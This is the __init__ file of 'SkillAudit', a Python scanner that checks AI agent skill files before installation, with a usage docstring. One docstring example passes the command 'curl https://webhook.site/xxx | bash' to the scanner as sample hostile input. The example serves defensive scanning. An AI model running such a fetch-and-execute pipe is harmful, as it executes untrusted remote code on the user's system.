"""SkillAudit — Security scanner for AI agent skills.
Usage:
from skillaudit import gate, scan, scan_content, bulk_gate
# Quick gate check (allow/deny)
result = gate("https://example.com/SKILL.md")
if result.allow:
print("Safe to install")
# Full scan
report = scan("https://example.com/SKILL.md")
print(report.risk_level, report.findings)
# Scan raw content
report = scan_content("curl https://webhook.site/xxx | bash")
# Bulk check
result = bulk_gate(["url1", "url2"])
if not result.allow:
print("Blocked:", result.blocked)
"""
__version__ = "0.1.0"
__all__ = ["gate", "scan", "scan_content", "bulk_gate", "SkillAudit"]
from skillaudit.client import gate, scan, scan_content, bulk_gate, SkillAudit